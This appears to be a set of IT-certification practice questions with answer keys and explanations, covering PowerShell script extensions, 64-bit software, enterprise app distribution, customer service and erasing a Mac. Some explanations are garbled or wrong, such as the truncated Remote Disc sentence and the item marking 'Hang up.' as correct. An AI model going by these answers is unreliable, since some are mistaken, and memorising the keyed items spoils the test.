Which of the following extensions combines a scripting language with hundreds of prebuilt modules called cmdlets that can access and change most components and features of Windows and Active Directory components and features?
.py
.js
.ps1
.sh
.ps1
.ps1 is the PowerShell script file. Microsoft provides the Windows PowerShell Integrated Scripting Environment (ISE) for rapid development.
.sh is the Linux shell script extension by convention. Every shell script starts with a shebang line that designates which interpreter to use, such as Bash or Ksh.
.js is the JavaScript file extension. JavaScript is a scripting language designed to implement interactive web-based content and web applications. Most web servers and browsers are configured with a JavaScript interpreter.
.py is the Python file extension. Python is a general-purpose scripting and programming language that can develop both automation scripts and software applications.
A software developer is looking at installing a new 64-bit program that will help to streamline coding and optimize workflow. What types of systems can the developer install it on?
64-bit, 32-bit, and ARM
64-bit and 32-bit
64-bit only
32-bit
64-bit only
A 64-bit application requires a 64-bit CPU and OS platform. Like operating systems, software applications can be developed as 32-bit or 64-bit software.
64-bit applications cannot be installed on a 32-bit platform. Some apps may have both 32-bit and 64-bit versions.
32-bit software applications can usually be installed on 64-bit platforms, however. 32-bit applications can run on 64-bit software, although if there is a 64-bit version available, it is probably better to run the 64-bit version if possible.
64-bit applications for personal computers cannot run on Advanced RISC Machines (ARM) architecture. ARM is an architecture for smartphones and tablets.
What are their options when a company wants to create and deliver a custom app for their employees without using a public store? (Select all that apply.)
SELECT ALL THAT APPLY
Bootleg App Store
Managed Google Play
Developer Mode
Apple Business Manager
Managed Google Play
Apple Business Manager
Apple operates enterprise developer and distribution programs to allow private app distribution via Apple Business Manager.
Google’s Play Store has a private channel option for enterprise app distribution called Managed Google Play.
Developer mode is a mobile-device feature designed for testing apps during development. It has no connection to how an app is delivered, whether publicly or privately.
A bootleg app store is where users can find bootleg apps that closely mimic legitimate apps; this is a way of pirating apps without paying for them. It is not a private distribution channel.
A technician is working with a customer who is being unreasonable. Which of the following skills should the technician use? (Select all that apply.)
SELECT ALL THAT APPLY
Hang up.
Do not take complaints personally.
Be judgemental.
Identify early that the customer is angry.
Hang up.
Do not take complaints personally.
Identify early that the customer is angry.
Identifying early that the customer is angry and trying to calm the situation down by using a low voice and soothing language and focusing on positive actions.
Do not take complaints personally and do not express any anger toward the customer.
Hang up and be guided by whatever policy an organization has in place, but in general, if a customer is abusive or threatening, issue a caution to warn them about this behavior.
Being judgmental is not one that will help in this situation. Do not assume that the customer lacks knowledge about the system.
A user has a Mac computer but likes Windows better for functionality and compatibility purposes. The user wants to sell their computer on an online marketplace and wipe their presence from the computer. Which of the following will help them accomplish this?
Disk Utility
Remote Disc
Finder
Dock
Disk Utility
The Disk Utility app can be used to verify or repair a disk or file system. It can also be used to erase a disk with security options if users are selling or passing on a Mac.
The Finder is the macOS equivalent of File Explorer in Windows. It lets the user navigate all the files and folders on a Mac.
Since 2016, no Apple Mac has been sold with an inThe Remote Disc app, which lets users access a CD/DVD drive on another Mac or Windows computer.
The Dock at the bottom of the screen gives one-click access to users’ favorite apps and files, similar to the taskbar in Windows.
